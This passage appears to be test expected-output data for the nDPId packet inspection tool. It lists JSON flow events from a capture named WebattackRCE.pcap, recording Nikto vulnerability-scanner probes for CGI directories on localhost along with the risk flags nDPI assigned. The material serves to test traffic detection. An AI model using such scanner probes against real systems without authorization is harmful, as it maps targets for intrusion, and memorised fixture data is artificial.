Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1576420276710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276710,"pkt":"AAAAAAAAAAAAAAAACABFAADEp+BAAEAGlFF\/AAABfwAAAcHMH5C4I5\/IUy7GWoAYAED+uAAAAQEICp1m+w6dZvsNR0VUIC9vd3MtYmluLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1576420276711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276711,"pkt":"AAAAAAAAAAAAAAAACABFAADEXJRAAEAG351\/AAABfwAAAcHOH5AWt2SMpHJk2oAYAED+uAAAAQEICp1m+w+dZvsPR0VUIC9jZ2ktc3lzLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1576420276713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276713,"pkt":"AAAAAAAAAAAAAAAACABFAADG5r1AAEAGVXJ\/AAABfwAAAcHQH5DCed6iQK2\/KYAYAED+ugAAAQEICp1m+xCdZvsQR0VUIC9jZ2ktbG9jYWwvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1576420276714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276714,"pkt":"AAAAAAAAAAAAAAAACABFAADCR6dAAEAG9Ix\/AAABfwAAAcHSH5C\/OX\/AhojitYAYAED+tgAAAQEICp1m+xKdZvsSR0VUIC9odGJpbi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1576420276717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276717,"pkt":"AAAAAAAAAAAAAAAACABFAADD3hBAAEAGXiJ\/AAABfwAAAcHUH5AtGuYWzQuuvoAYAED+twAAAQEICp1m+xSdZvsUR0VUIC9jZ2liaW4vIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1576420276718,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276718,"pkt":"AAAAAAAAAAAAAAAACABFAADB4dFAAEAGWmN\/AAABfwAAAcHWH5B7V9nVmVXzCoAYAED+tQAAAQEICp1m+xadZvsWR0VUIC9jZ2lzLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCg0K"} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1576420276719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276719,"pkt":"AAAAAAAAAAAAAAAACABFAADEZD1AAEAG1\/R\/AAABfwAAAcHYH5Ba2lwhPKb01YAYAED+uAAAAQEICp1m+xedZvsXR0VUIC9zY3JpcHRzLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1576420276721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276721,"pkt":"AAAAAAAAAAAAAAAACABFAADEcYRAAEAGyq1\/AAABfwAAAcHaH5DTlEmfv44DhoAYAED+uAAAAQEICp1m+xmdZvsZR0VUIC9jZ2ktd2luLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1576420276722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276722,"pkt":"AAAAAAAAAAAAAAAACABFAADF6C5AAEAGVAJ\/AAABfwAAAcHcH5DviNAxcnIUCYAYAED+uQAAAQEICp1m+xqdZvsaR0VUIC9mY2dpLWJpbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1576420276724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276724,"pkt":"AAAAAAAAAAAAAAAACABFAADEjEdAAEAGr+p\/AAABfwAAAcHeH5D1xLRZpE\/AW4AYAED+uAAAAQEICp1m+xydZvscR0VUIC9jZ2ktZXhlLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1576420276725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276725,"pkt":"AAAAAAAAAAAAAAAACABFAADFFmlAAEAGJch\/AAABfwAAAcHgH5D+Si57PKwG0oAYAED+uQAAAQEICp1m+x2dZvsdR0VUIC9jZ2ktaG9tZS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
